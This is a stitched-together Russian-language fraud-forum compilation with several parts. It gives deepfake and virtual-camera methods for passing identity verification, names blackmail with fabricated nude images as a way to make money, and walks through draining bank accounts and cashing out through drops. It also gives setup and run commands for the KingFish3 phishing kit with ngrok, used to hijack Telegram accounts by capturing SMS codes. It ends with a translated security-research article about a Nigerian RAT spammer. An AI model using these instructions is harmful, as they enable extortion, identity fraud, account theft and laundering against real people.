Вам не нужно быть точным, и некоторые другие конфигурации могут дать еще лучшие результаты, но обычно это хорошая отправная точка.
Теперь, скачиваем плагин для OBS, а также сам OBS Studio
https://obsproject.com/forum/resources/obs-virtualcam.539/ ( выберите
установить и зарегистрировать только 1 виртуальную камеру):
Запускаем OBS.
В разделе Sources нажмите на кнопку Добавить (знак"+"), выберите Windows Capture и нажмите OK. В появившемся окне выберите "[python.exe]: avatarify " в выпадающем меню окна и нажмите кнопку OK. Затем выберите Edit -> Transform -> Fit to screen.
В OBS Studio перейдите в меню Сервис - > VirtualCam. Проверьте автозапуск, установите Буферизованные кадры в 0 и нажмите кнопку Пуск.
Теперь OBS-Camera camera должна быть доступна в Zoom (или другом программном обеспечении для видеоконференцсвязи).
Настраиваем gps под прописку и ищем чистый ip под город прописки!
МЕТОД 2
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Ссылка на ДипФэйсЛаб
https://github.com/iperov/DeepFaceLab
Необходимые файлы:
cuda_9.2.148_windows.exe (потом перезагрузить)
cuda_9.2.148.1_windows.exe
cudnn-9.2-windows7-x64-v7.1.zip
ИСПОЛЬЗОВАЛАСЬ ПРОГРАММА ОТ 20/06/2019
Видео от разработчика
ВАЖНО!!!!
ВНЕ ЗАВИСИМОСТИ ОТ ТОГО сколько идёт ваше видео, обработка замены лица по времени займёт одинаковый промежуток.
Чем больше итераций - тем лучше. В видео с Лешей Шевцовым (itpedia) было использовано почти 80,000
Для самого крутого показателя можно использовать 500,000 (займет 3-4 дня, все зависит от видюхи)
Это исключительно мой черновик для заметок, я не старался его адаптировать под кого-либо, только делал для себя.
-------------------------------------------------------------------
После скачивания есть версии
DeepFaceLabCUDA9.2SSE для NVIDIA видеокарт вплоть до GTX1080 и любых 64-бит процессоров.
DeepFaceLabCUDA10.1AVX для NVIDIA видеокарт вплоть до RTX и процессоров с поддержкой AVX инструкций.
DeepFaceLabOpenCLSSE для AMD видеокарт и любых 64-бит процессоров.
Первый - data_dst.mp4 ---- это лицо, которое будет заменяться
Второй - data_src.mp4 ---- это лицо, которое будет использоваться для замены.
Порядок
extract PNG from video data_src.mp4 - программа извлекает лицо, которым БУДЕМ ЗАМЕНЯТЬ. Формат лицо PNG
3.2) extract PNG from video data_dst FULL.mp4 - программа извлекает лицо, которое БУДЕТ ИЗМЕНЕНО. Формат PNG
4.1) data_scr check result - проверка как извлеклось лицо, КОТОРЫМ БУДЕМ ЗАМЕНЯТЬ.
4.2.2) data_src sort by similar histogram - После этой сортировки лица будут сгруппированы по содержанию, так что отсеять ненужные лица теперь намного проще.
Пролистываете скроллом и удаляете ненужные лица группами.
4.1) data_scr check result - проверка как извлеклось лицо, КОТОРЫМ БУДЕМ ЗАМЕНЯТЬ. Удаляем ненужные. Видите, лица теперь находятся согласно повороту головы.
4.2.1) data_src sort by blur.bat - Сортировка по резкости. Запускаете и ждете сортировки. Затем смотрите результаты. Самые мутные лица будут в конце. Для src важно убрать мутные лица.
4.1) data_scr check result - проверка как извлеклось лицо, КОТОРЫМ БУДЕМ ЗАМЕНЯТЬ. Удаляем ненужные МУТНЫЕ ЛИЦА.
указать лица на кадрах, где вообще не определилось никаких лиц.
5.1) data_dst check result
5.2) data_dst sort by similar histogram - Если в целевом видео содержатся другие ненужные лица, можете произвести эту сортировку, и затем удалить эти лица будет проще.
5.1) data_dst check result - удаляем ненужные кадры
в manual_ru.pdf
ЖДЕМ
!!! 6) train H64 best GPU - еще раз. Появляются какие-то диаграммы, потом закрывается.
Вроде он всегда нажимал на 0. -3,01 в видео
Комбинации:
1
1
пусто
пусто
-5
пусто
пусто
пусто
!!!7) convert H64 debug - ЕЩЕ РАЗ?
Комбинации:
1
1
20
40
пусто
пусто
пусто
пусто
Комбинации:
1
1
20
40
пусто
пусто
пусто
пусто
ЖДЕМ ЗАВЕРШЕНИЯ
ЖДЕМ ЗАВЕРШЕНИЯ
Идем в папку РЕЗУЛТ и видим новый файл result.mp4
----------------------------------------------------------------------------------------------------
Конфиги если захотите треннировать на SAE
== Model options:
== |== autobackup : True
== |== write_preview_history : True
== |== batch_size : 2 (
== |== sort_by_yaw : False
== |== random_flip : False
== |== resolution : 192
== |== face_type : f
== |== learn_mask : True
== |== optimizer_mode : 2
== |== archi : liae
== |== ae_dims : 192
== |== e_ch_dims : 42
== |== d_ch_dims : 21
== |== multiscale_decoder : true
== |== ca_weights : true
== |== pixel_loss : False
== |== face_style_power : 10
== |== bg_style_power : 10
== |== apply_random_ct : true
== |== clipgrad : true
== Running on:
== |== [0 : GeForce GTX 1080]
На А64 все по дэфолту
---------------------------------
СОВЕТ
H128, DF, LIAEF128 моделей:
Use pixel loss? (y/n, ?:help skip: n/default ) :
позволяет быстрее улучшать мелкие детали и убрать дрожание. Включать только после 20к итераций.
-----------------------------------------------------------------------------------------------------------------------
-----------------------------------------------------------------------------------------------------------------------
-----------------------------------------------------------------------------------------------------------------------
-----------------------------------------------------------------------------------------------------------------------
-----------------------------------------------------------------------------------------------------------------------
Сайт второй программы
https://faceswap.dev/forum/viewtopic.php?f=5&t=27
-------------------------------------
ВАЖНО!!!!
ВНЕ ЗАВИСИМОСТИ ОТ ТОГО сколько идёт ваше видео, обработка замены лица по времени займёт одинаковый промежуток.
Чем больше итераций - тем лучше. В видео с Лешей Шевцовым (itpedia) было использовано почти 80,000
Для самого крутого показателя можно использовать 500,000 (займет 3-4 дня, все зависит от видюхи)
Настраиваем gps под прописку и ищем чистый ip под город прописки!
------
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
МЕТОД 3
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
<https://www.elladodelmal.com/2019/04/autoencoders-gans-y-otros-chicos-
buenos_10.html> - СТАТЬЯ .
Настраиваем gps под прописку и ищем чистый ip под город прописки!
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
МЕТОД 4
Подмена изображения в камере,этим способом к примеру можно регистрировать акки каргеринга на левые данные, ибо в некоторых приложениях нельзя загрузить уже имеющиеся photo,для этого нам всего лишь потребуется всего лишь установленная операционная система Linux.
1. Устанавливаем виртуальную камеру
Ставим кодек;apt-get install git make ffmpeg
Клонируем репозиторий драйвера;
mkdir codek
cd codek
git clone https://github.com/umlaeute/v4l2loopback.git
cd v4l2loopback
Устанавливаем;
make && sudo make install
sudo depmod -a
И запускаем;
sudo modprobe v4l2loopback
У нас появляется устройство /dev/video0 или цифра выше если у вас уже стояло что-то
2. Запускаем трансляцию изобразения в видео поток драйвера ffmpeg -loop 1 -r 1/5 -i "path_to_image" -c:v libx264 -vf fps=25 -vcodec rawvideo -pix_fmt yuv420p -threads 0 -f v4l2 /dev/video0
Указываем обязательно -loop 1 чтобы зациклить данное действие.
3. Ну теперь финальная стадия, это эмуляция,открываем Android Studio,
открываем окно где редактируется виртуальная машина и в настройках камеры,
выбираем наше виртуальное устройство,запускаем и разуемся жизни
Настраиваем gps под прописку и ищем чистый ip под город прописки!
МЕТОД 5
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
https://www.limontec.com/2018/02/deepfakes-criando-videos-porn-falsos.html
- СТАТЬЯ
Настраиваем gps под прописку и ищем чистый ip под город прописки!
МЕТОД 6
Создания подмена камеры
https://github.com/corkami https://github.com/corkami/mitra
file1 first (top) input file.
file2 second (bottom) input file.
optional arguments:
-h, --help show this help message and exit
-v, --version show program's version number and exit
--verbose verbose output.
-n, --nofile Don't write any file.
-f, --force Force file 2 as binary blob.
-o OUTDIR, --outdir OUTDIR
directory where to write polyglots.
-r, --reverse Try also with
-s, --split split polyglots in separate files (off by
default).
--splitdir SPLITDIR directory for split payloads.
--pad PAD padd payloads in Kb (for expert).
Настраиваем gps под прописку и ищем чистый ip под город прописки!
МЕТОД 6
Для тех кто не мог пройти верификацию( а я знаю что таких много). Держите
подгончик. Как никак Badoo один из лидеров по количеству мамонтов и дрочеров.
В Snapchat появился фильтр, меняющий пол. Эта фича позволяет с легкостью
пройти верификацию на Badoo, а дальше - принимать дрочерский трафик и
зарабатывать на нем всеми известными способами.
Необходимо открыть камеру в приложении, справа от кнопки «Сделать фото» есть
раскрывающаяся галерея масок — нужные фильтры находятся там;
Среди «масок» есть две: одна с мужским лицом, другая с — женским. Это и есть
фильтры «смены пола»;
После активации фильтра нужно выставить камеру так, чтобы лицо попало в
границы «маски»;
Фильтр работает только в «живом» режиме, из галереи фото добавлять нельзя. Но
можно переключиться на заднюю камеру и, к примеру, захватить лицо человека на
фото.
Настраиваем gps под прописку и ищем чистый ip под город прописки!
МЕТОД 7
Для начала https://developer.nvidia.com/cuda-80-ga2-download-archive и устанавливаем CUDA 8.0
Установка стандартная, после перезагружаем. Патчить ничего не надо.
Скачиваем fakeapp
Скачиваем https://ffmpeg.zeranoe.com/builds/
ВАЖНО! ПОВТОРЯЕМ В ТОЧЬ ТОЧЬ!!!
Распаковываем FakeApp.zip в корень диск С. А так-же в корне диска С создаем папку fakes, внутри создаем папки data, data_A, data_B.
ffmpeg, распаковываем в папку FakeApp.
Получаем такую картину
Этап подготовки видео
Я загрузил видео с интервью Хлое Морец и теперь нужно на любом видеоредакторе
нарезать участки видео с её лицом.
Сохраняем нарезанное видео в качестве 720p в папку C:\fakes\data_A называем её
1.mp4
Запускаем командную строку, пишем:
C:\FakeApp\ffmpeg\bin\ffmpeg.exe -i C:\fakes\data_A\1.mp4 -vf fps=25
"C:\fakes\data_A\out%d.png"
В папке C:\fakes\data_A видим как появляются картинки, ждем завершения
процесса.
После завершения удаляем в папке C:\fakes\data_A видео 1.mp4
Запускаем fakeapp.bat в папке C:\FakeApp
Выбираем Align, поле Data указываем C:\fakes\data_A
Жмем Start.
ЖДЕМ ПОЛНОГО ЗАВЕРШЕНИЯ!
В папке C:\fakes\data_A появится папка aligned где все упорядочены её лица.
Этап номер два
Находим видео для друга и повторяем весь процесс, только вместо data_A
указываем data_B. Главное видео для друга должно быть одно лицо, если лиц в
кадре несколько, программа будет менять их все.
После того как в папке data_A и data_B появилась папка aligned с упорядоченными лицами переходим к тренировке. Этот процесс жопаболь, ибо уходит очень много времени для тренировки нейросети.
Переходим на вкладку Train
В поле Data A указываем путь C:\fakes\data_A\aligned
В поле Data B указываем путь C:\fakes\data_B\aligned
Жмем Start и ждем. Наблюдаем как постепенно нейросеть учится и качество фото
улучшается. Если надоело ждать или качество вас устраивает, нажимаем клавишу
Q, программа сохранит "весы" связей и можно будет в дальнейшем продолжить
расчеты, ничего не теряется.
Нейросеть будет учиться примерно сутки на 1050ti.
Склеивать готовое видео не долго, по времени уходит максимум 1 час.
Варианты монетизации
Вебкам;
Шантаж;
Идентификация;
И т. д.
— прикручиваешь фотку клиентки к «голому телу» (мама я на вписке) и вежливо
просишь оказать материальную помощь
— прикручиваешь фотку к видео и проходишь идентификацию в партнерках/сервисах
Настраиваем gps под прописку и ищем чистый ip под город прописки!
bitzlato
hodlhodl
paxful
bitpapa
cryptolocator
localcryptos
localcoinswap
garantex
Whitebait
Totalcoin
Chatex
Risex
Vertex
prizmBit
Bitcoinglobal
skyBTCbanker
SkyCrypto
monabey
bisg
Localmonero
AgoraDesk
И другие
Поздравляю, вериф пройден, дальше все интуитивно понятно, везде где можно тыкай later и попадай на главное окно банка. Тут разобраться сможет даже ребенок, для того что бы слить банк найди AN&RN в Курренте.
В банке который сливаешь найди функцию EXTERNAL ACCOUNTS, там введи номера счетов (AN&RN Куррента). (Сверки по имени на курренте нет, регать под кх ничего не нужно, не переживай, все дойдет). Самые хитрые могут написать сервисам обнала банков, они вам по скринам скажут куда тыкать, а вы в итоге введете свои анрн, а перед сервисом отмажетесь. Лайвхак для ленивых/мразей так сказать.
Дождись MINI DEPOSITS на Куррент (обычно 1 рабочий день) и введи в банк с которого тащишь доллары
отправь по лимитам (до 1000$ за транзакцию на прием в Курренте, если больше будет бан). Не забудь про фильтры на почту или спам если почта невалид, имхо лучше потратить пару тысяч рублей на трехдневный спам почты кх чем потом горевать что пасс на банке сменен.
Окей гуру, как же мне вывести эти бабки в фиат, а еще лучше в битки?
Это правильный вопрос, и тут самое приятное, бин этого банка лезет в ру. А что
это значит? это значит что бабки снять проще простого, даю 3 легких способа
обнала в фиат, а в битки думай
сам
Кстати лимит на снятие - 2к$ в сутки
1.Название этому способу я дал "ПосТерминальный" тебе требуется привязать VCC в Google Pay/Apple Pay (что бы привязать требуется сменить номер в курренте на Google Voice) и заливать в пос треминал/пользоваться как своей картой/закупаться айфонами под завязку и продавать скупщику под 80-90% инстантом, скупщик легко ищется на авито. Что можно сказать по этому поводу? Я сам так делал когда узнал что контора лезет в Ру, таким образом за пару часов муток в реале можно получить 100-130к рублей с одного залитого аккаунта Current в сутки. Неплохо однако.
2. Способ называется "Адепт обнала". Некст левел плей, теперь ты будешь заливать Ру(не ру) симки/пополнять аккаунты чего угодно в терминалах оплаты с привязанным к нему пос терминалом или просто по номеру карты, экспе и CVV
3."Уникум" это самый гениальный способ сналиться под 100% не вставая с дивана. Для начала закажи на дропа карту и симку банка Тиньков, обязательно Black Metal, он просто круче)) Через admitad.сom регистрируемся как вебмастер можете по реф ссылке которую создадите со первого акка. Берёте любую группу с вк, телеграмм и пытаетесь привязать как свою площадку подаёте запрос на добавление тип вы веб мастер(они даже не проверяют кто реальный владелец) вебмастеру, если такая привязана, то другую ищите. Подаёте запрос на сотрудничество тинькофф например после одобрения по ссылкам заказываете и вам падают абсолютно белые деньги типо вы продвигаете продукт и по вашей ссылке получают карты))) Если отказ от сотрудничества подключается другую чужую группу(делается просто разберётесь) через тикет отправляете повторно заявку. Платят за них нормально.
Греете карту большими суммами около месяца, или сразу заливаете этим способом, но получаете неминуемый бан, рисуете карту куррента с именем дропа на чье имя сделана тинька , закидываете отморозкам из тиньков и получаете свои кровные. Кстати это фродовый способ пополнения так что банк установил на него лимит в 1,5�� в месяц, но ничего, делай больше дроп карт. Я пришедшие на тинькофф деньги иду снимать в банкоматах. Можете начать со слива на свои карты, я так делал но никаких вопросов не было.
Тебе точно ничего не грозит за оплату через NFC в Ру, так как ни google ни apple не раскрывают данные карт третьим лицам, и вообще их системы построены на том что под каждую оплату (или под каждую карту, не уверен) у них генерируется своя VCC, и оплата происходит с нее. Запомни, работа по Ру это работа с Ру матом, а не залив в Ру мерчи, посы или банки (имхо).Единственный кто попросит тебя отчитаться за эти деньги это налоговая или банк эквайринг. Спи спокойно мой друг, тебе ничего не грозит.
Ссылка на github:
![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2F8da5cf8752f5a3e0538e47da78ed777888dead14f0a9252350f92cefbf007396%2Ftermux- lab%2Fkingfish3&hash=6326fbae87ea568c18f77ee5dd4bb421&return_error=1)
lab/kingfish3)
Contribute to termux-lab/kingfish3 development by creating an account on GitHub.
github.com
Установка.
Code:Copy to clipboard
$ pkg install git
$ pkg install python
$ pkg install php
$ pkg install openssh
$ git clone https://github.com/termux-lab/kingfish3
$ pip3 install prettytable
Запуск.
Code:Copy to clipboard
$ cd kingfish3
$ cd kingfish3.0
$ python3 fsh.py
Выбираем язык. (желательно русский)
И у нас там 2 варианта.
Фишинги и вещь, которая охотиться на гео данными.
Выбираем то, что нам нужно, указываем порт, и обязательно переадресацию(по
умолчанию https://google.com)
И у нас запустится сервак.
Открываем 2 сессию и запускаем Ngrok.
Для тех у кого нет Ngrok.
Code:Copy to clipboard
$ git clone https://github.com/tchelospy/termux-ngrok
$ cd termux-ngrok
$ ./termux-ngrok.sh
$ y
Как работает KingFish3?
А как выглядит это со стороны жертвы?
Запускаем, получаем и кидаем ссылку жертве.
Жертва вводит номер телефона и жмёт далее.
Затем жертва ожидает смс код, а мы получаем его номер телефона.
Открываем телегу и вводим этот номер. Затем Мы идём далее и жертве приходит смс с кодом.
Жерва вводит код, а мы получаем.
Затем открываем телегу, вводим этот код и мы вошли в аккаунт.
Там будет сообщение о входе, не забудьте сразу, как вошли, удалить это
сообщение.
Доброго времени суток! Задался вопросом, существует ли готовое ПО(скрипт) для
сбора ссылок на файлы (rar, exe, zip и т.п.) размещенных на конкретном сайте?
Если есть поделитесь названиями, буду благодарен!
P.S. гугл курил, есть варианты для скриптов, картинок.
Киберпреступность - это улица с односторонним движением. Сомнительные типы пускают по ней вредоносные документы и трояны, прямо к невинным людям. В худшем случае, мы заразимся. В лучшем случае, мы ухмыляемся, нажимаем "удалить" и двигаемся дальше. В любом случае, у нас остаётся много вопросов. Кто делает рассылку? Откуда у них наш электронный адрес? Они действительно зарабатывают деньги, делая это? Сколько?
Если вы задавали себе эти вопросы слишком много раз, то сегодня ваш счастливый день. Познакомьтесь с A"""""""""""" A""""""" D""""""ton, которого мы будем называть Dton для краткости:
Dton - порядочный нигерийский гражданин. Он верит в профессионализм, трудолюбие и совершенство. Он лидер, креативный человек, предприниматель и новатор, опытный бизнес-администратор, человек эпохи Возрождения, которого обожают его коллеги. Даже его учитель начальной школы готов петь похвалы, когда он звонит.
Но за этой позитивной личностью скрывается темная тайна. В лучших традициях злодеев из комиксов Dton ведет двойную жизнь:
Днем, Dton - управляющий предприятиями и успешный человек. Но ночью - Билл Генри, киберпреступник-предприниматель.
Билл - постоянный покупатель в магазине Ferrum - хорошем бизнесе, торгующем 2 500 000 украденных кредитных карт. В течение 2013-2020 годов счет, на который он регулярно заходит, был использован для покупки украденных реквизитов кредитных карт на сумму более 13 000 долларов США.
Как только Билл получает в руки украденные данные кредитной карты, он быстро монетизирует свой новый актив:
Типичная денежная операция составляет 200 000 нигерийских найра (НАН), что эквивалентно примерно 550 долларам США. К счастью для тех, кто владеет оригинальной кредитной картой, используемой в примере выше, сделка не проходит, но Билл терпелив. Он пытается воспользоваться услугами другого торговца, и если это не удается, он покупает другую кредитную карту за еще 4 или 16 долларов и пытается снова. В конце концов, сделка проходит. Грубый подсчет показывает, что в 2013-2020 годах 13 000 долларов, потраченные с этого счета, были конвертированы примерно в 1000 кредитных карт, которые затем были обманным путем обчищены на общую сумму превышающую 100 000 долларов - возможно, в несколько раз больше.
Вы можете возразить, что вышеприведенная история противоречит здравому смыслу и элементарной экономики. Если с украденной кредитной карты можно обманным путем снять 500 долларов, зачем кому-то продавать ее всего за 10 долларов? Ну, украсть данные кредитной карты легко и анонимно, учитывая, что банковские вредоносные программы и вредоносные программы для точек продаж находятся повсюду, и, как известно, их трудно отследить до того, кто их написал и разместил. Списание средств с кредитных карт - это нечто совершенно другое. Оно несет в себе целый ряд дополнительных рисков и требует определенных навыков. Главное среди этих навыков - абсолютная дерзость, в которой Dton не испытывает недостатка, как вы скоро увидите.
Бизнес Dton'а всегда был его гордостью, но одна вещь его не устраивала - ему приходится постоянно платить магазину Ferrum. Он знал, что истинные кровожадные киберпреступники собирают данные карт своими собственными руками со спам-полей, покрытых утренней росой. Он жаждал жить этой жизнью. Иногда он тратил 10 долларов в магазине Ferrum, и сделки даже не проходили. Его негодование росло. Он был предпринимателем, а не азартным игроком.
Больше не нужно было просто покупать, продавать и монетизировать данные жертв, это был вопрос времени, когда Dton начнет погружаться в мир самостоятельно украденных данных. Он покупал "зацепки" - адреса электронной почты потенциальных жертв - оптом.
Но большая часть его внимания была направлена на покупку вредоносов: пакеры и крипторы, стилеры и кейлоггеры, эксплоиты и выделенные виртуалки. У него была настоящая страсть играть на этом поле и наблюдать, какие инструменты работают лучше всего. Из вредоносных программ, он купил и попробовал AspireLogger:
И Nanocore:
И OriginLogger:
И многие, многие другие программы такого рода, о которых предупреждает Windows Defender. Вскоре у Dton'а появилась твердая основа для спам кампаний - армия удаленных, анонимизированных виртуалок, к которым он мог подключаться с помощью VPN, и которые были оснащены необходимыми для его работы инструментами. На этих машинах он прогонял отобранные вручную вредоносы через пакеры:
Внедрял их в красиво выглядящие документы:
Аккуратно выбирал текст и тему, затем рассылал огромному списку жертв.
И вскоре получал на почту учетные данные пользователей. Nanocore и другие подобные инструменты были успешно доставлены жертвам. Dton был в восторге.
_- Ок, бро
- Ты тут?
- Канеш бро
- Nanocore, этим утром
- БРО ОБНАЛИЧИВАЙ ВСЁ_
Для Dton'а это было важной вехой в карьере, но тем не менее, не все было так радужно. Иногда поставщики инструментов Dton'а просили много денег:
_- Ващето у меня нет билдера, я создаю приватные билды (*видимо имею в виду, что он не продает сами билдере, а только собраные ими бинарники)
- Я скину тебе мои бинарник и ты сбилдишь мне
- Да
- По 800 баксов за файл?
- За три файла. Имею в виду, что они 100% рабочие, так как детект на VT 0/57_
На месте Dton'а, Вы бы заплатили $800 за 3 бинарника с 0 детектов на VirusTotal? Наверное, нет. Статистика с Virustotal не всегда актуальна, и не гарантирует охват всего спектра защит, предлагаемых поставщиками.
Хуже того, Dton расходится во мнениях со своим менеджером, когда обсуждает планы:
_Менеджер: завязывай заниматься херней, иначе я тебе не понравлюсь
Dton: тебе не нравится то, что я хочу тебе помочь
Dton: что за неблагодарный ты человек
Dton: я закриптовал твои два файла и вредоносный макрос
Dton: и ты просишь меня о smtp, а я говорю smtp еще не готов
Dton: ты продолжаешь нести чушь из своего рта
Dton: просто потому что ты прислал мне 5к
Dton: я не осуждаю тебя
Dton: группа о которой ты мне сказал, проблема там, и это единственное дело, которое я не завершил вовремя, ты превращаешь меня в потрошителя. Но ты ничего не говорил про дело, которые мы сделали до этого. Теперь же, когда я не закончил вовремя доставку вредоносов жертве полностью ты сделал меня потрошителем_
Да - у Dton'а есть менеджер. Возможно, у его менеджера тоже есть менеджер и так далее. Как видите, менеджер Dton'а ("А" для краткости) периодически вносит венчурный капитал и ожидает неплохой доход. Если проект не идет хорошо, Босс злится, и, как он говорит, вы не хотели бы, чтобы он злился. Босс Dton'а очень жесткий начальник, а условия найма Dton'а, по-видимому, требуют, чтобы он установил на свой компьютер инструмент удаленного администрирования (RAT), к которому его босс может получить свободный доступ. Это приводит к очень странным разговорам:
Мистер А: ты зашел в мой яндекс?
_Dton: сори бро, это не я
Мистер А: если я поменяю пароль, то репорты перестанут отсылаться?
Dton: создай другой
Мистер А: я думал это мой rdp rat, который ты скидывал
Dton: расслабься _
Да, мистер А, расслабьтесь. Забейте на киберпреступника, за каждым движением которого вы навязчиво следите, и который только что вошел в ваш аккаунт Яндекса. Остыньте.
Почему босс Dton'а так свободно делится своими учетными данными Яндекса со своим подчиненным? Это очень хороший вопрос. И опять же, зачем им обоим использовать один и тот же почтовый ящик для кражи данных жертв и для рутинного RAT-мониторинга работы Dton'а? Взгляните еще раз на поток входящих данных о жертвах:
Все восстановленные данные с меткой "HP-PC" отслеживаются из машины Dton'а, агрегируются с остальными данными жертвы. В определенном поэтическом смысле, Dton - просто еще одна жертва. Напоминает известную цитату с reddit: "Я работаю посудомойщиком, и я возвращаюсь домой после нескольких часов работы весь в грязи, а затем принимаю душ только для того, чтобы понять... что я - последнее блюдо".
Итак, у карьеры Dton'а многообещающее будущее, и его операция по рассылке RAT- спама жива. Но коэффициент конверсии не тот, каким он мог бы быть, и босс Dton'а несчастлив. Упаковка вредоносных программ для улучшения конверсии требует дополнительных трат. Dton начинает сомневаться в целесообразности всей затеи. Он использует известные вредоносные программы, и, следовательно, они детектятся многими решениями по безопасности, так как вендоры не дремлют. Если он пытается обойти детект кастомным пакером или крипто сервисами, то должен доплачивать. Бесплатные пакеры на его виртуалках просто не справляются.
Затем Dton'у приходит мысль, что технически есть выход - написать свой собственный RAT. Если он написан с нуля, то будет подобен коронавирусу. Ни у кого нет сигнатур, ни у кого нет вакцины, ни одна из существующих иммунных систем никогда не видела его раньше. К тому времени, как он начнет детектится, уже будет нанесен большой ущерб.
Конечно, Dton не программист. Он должен заставить кого-то другого сделать это за него. Он получает рекомендацию такого человека, который зависает на каком- то дискорде под названием "RATs & exploits". Господин &exploits уже общался со многими клиентами и имеет заготовленный ответ для тех, кто заинтересован в его услугах:
_Dton: я уже на твоем сервере бро
Dton: можешь прислать мне прайс?
RATs & exploits: я предоставляю два сервиса: приватные RAT + RDP + конфигуратор + приватные FUD стабы + бесплатная поддержка_
Dton нанимает этого человека, и сделка начинает обретать форму.
_Dton: че мы теперь будем делать
RATs & exploits: я думаю над этим. я в курсе, что у тебя осталось 2 месяца
Dton: да, и мне надо начать работать над этим
RATs & exploits: пожалуйста оплати оставшийся баланс. Хорошо. Я решил написать новый RAT для тебя. Я также куплю новый RDP. Я возьму с тебя только $10, остаток оплачу сам. Ты платишь мне 100+10=110. В течении двух месяцев_
RATs&exploits также предлагает персональную техническую поддержку и практическую демонстрацию того, как использовать RAT. Здесь он демонстрирует использование известной вредоносной программы "Azorult" на виртуальной машине:
Это оставило хорошие впечатления и вскоре началась оплата. Инструментарий Dton'а вышел на новый уровень. Теперь у него есть свой персонализированный RAT ручной работы, а также персонализированный веб-клиент для мониторинга своих жертв. Он откидывается назад, улыбается и изучает свой домен.
На самом деле, Dton нашел не только профессиональный контакт в лице этого RAT- разработчика, но и родственную душу:
_Dton: cпасибо, я никогда тебя не подведу бро, обещаю
RATs&exploits: я тоже, я с тобой до последней секунды, не оставлю тебя одного, встретимся завтра
Dton: спасибо босс, твой партнер и я в одном городе, мы увидимся на днях, он знает хорошего парня, имею в виду smtp парня
RATs&exploits: да, он гений, я его уважаю. очень хороший человек. и опытный_
Или не нашел?
Незадолго после этого Dton удаленно просматривает свежие скриншоты, взятые с персональной машины разработчика, с которым он только что имел дело.
Давайте повторим: Dton, чья бизнес-модель это заражать невинных жертв RAT'ом, и чья работа подвергается строгому наблюдению, заразив свою собственную машину RAT'ом, поручил разработчику вредоносного ПО написать для него персонализированный RAT, а затем скомпрометировал машину этого разработчика RAT'ом. Есть немалый шанс, что ваш мозг просто заразился RAT'ом, прочитав это предложение.
Dton продолжал преследовать мечту о том, чтобы его вредоносные программы были упакованы без необходимости платить сторонним сервисам. Вскоре он заинтересовался упаковщиком dataprotector (datap.pro), который предлагает "пожизненный план":
Привет. После заказа пожалуйста отправьте на admin|datap.pro ссылку на ваш профайл с hackforums, email с которого была оплата и id заказа. Если вы этого не сделаете, то не получите свой комплект. Спасибо заранее за ваше понимание
Конечно, ты не можешь просто взять и купить что-нибудь вроде datap. Тебе нужно знать, с кем поговорить. Вскоре Dton связался со своим контактным лицом, чтобы купить datap, под ником "n0$f3ratu$" (это "Nosferatus", для тех, кто не говорит на l33t). Опасаясь платить такую большую сумму вперед, Dton выбрал план на 45 дней, что составляет примерно десятую часть цены.
_Dton: спасибо, начинать оплату?
Dton: бро, оплатил_
Dton заплатил, использовал продукт несколько раз, и вскоре он разозлился.
Он был недоволен ни товаром, ни ценой, ни чем-либо еще. Он чувствовал, что для получения лучшей сделки ему нужно было надавить на n0$f3ratu$ и получить пожизненный план за $36,50. И тогда у Dton'а появилась идея.
Примечание переводчика - тут Dton катает заяву в интерпол, где говорит, что этот n0$f3ratu$ разрабатывает малварь, которую используют нигерийские киберпреступники, приводит все ссылки. Короче сдает полностью
Давайте посмотрим на это YouTube видео:
Это наш друг n0$f3ratu$ учит людей, как обойти Windows Defender, используя тот же самый криптор, который он только что продал Dton'у. В один момент Dton работал вместе с этим парнем, а в следующий всадил нож в спину. Снова.
Dton не сразу отправил это анонимное сообщение. Вместо этого он использует его, чтобы насмехаться над n0$f3ratu$, который реагирует так же позитивно, как вы и ожидали:
Поцелуй мою задницу или отсоси! Твой выбор! Когда ты заполнишь эту форму, пожалуйста расскажи им, как ты хотел получить с меня деньги. 300 баксов чувак, ты счастливчик, потому что мы никогда не увидимся в реале
Мы можем только предполагать, что n0$f3ratu$ имел в виду. Наверное, они с Dton'ом ввязались в очень горячие дебаты о цене пожизненного плана на dataprotector и обнаружили, что у них много разногласий. И таким образом Dton покорил наивысшую вершину в своей карьере - сильно разозлил людей, от чьей работы зависело все его жизнеобеспечение. Так держать, Dton.
Итак, чему мы научились?
В какой-то степени мы осознаем, что киберпреступники - это обычные люди. У них есть чувства, желания и потребности. Они держат обиды, совершают ошибки. Но некоторые киберпреступники гораздо более простые, чем другие. Мы не можем в достаточной мере акцентировать на абсурдном контрасте между более профессиональными операциями, которые мы наблюдали, с одной стороны, и ходячей катастрофой - с другой.
Где-то в России, в то время как вы читаете это, хорошо скоординированная банда ежедневно меняет свои C&C сервера и подписывает свои вредоносные программы валидным сертификатом. Баги правятся, добавляются функции, за безопасностью внимательно следят. Между тем, на другом конце земли, в Нигерии, Dton рассылает спам с RAT, который содержит захардкоденные учетные данные для одного почтового ящика Gmail, к которому все обращаются, а затем целенаправленно заражает себя и копией. Когда дела с кем-то идут хорошо, Dton заражает его RAT'ом на тот случай, если впоследствии это окажется полезным. Когда дела с кем-то идут не так хорошо, Dton стучит в Интерпол.
И знаете что? Dton в порядке. Dton живет хорошей жизнью.
Технически это фотография коллеги Dton'а, но суть вы поняли.
Нам не нужно говорить вам, как защититься от RAT'а Dton'а, потому что если вы читаете это, вы уже знаете, как. Обновите свой веб-браузер. Перед тем, как нажать на ссылку, спросите себя, кто ее туда поместил, и проверьте фактический целевой домен, начиная с верхнего уровня. Не открывайте эту мутную "счет- фактуру" или "уведомление об отгрузке". Если вы его откроете, не открывайте вложенный документ. Если вы его откроете, не нажимайте "включить макросы".
Это все банальные советы, которые повторяются миллион раз, но люди, которым нужно это услышать, не читают эту запись в блоге. Поэтому даже отмороженный Dton имеет кучу жертв и наслаждается наличными.
Поговорите со своими друзьями о ненапряжных киберпреступлениях. Скажите им, что всякий раз, когда они открывают электронное письмо, они должны долго и внимательно смотреть на фотографию выше, и представить себе человека, изображенного там, который сочиняет это письмо в окне Turbomailer. И что если изображение слишком хорошо подходит, то они должны очень внимательно подумать о следующем клике.
[оригинал](https://research.checkpoint.com/2020/the-inside-scoop-on-a-six-
figure-nigerian-fraud-campaign/)
источник
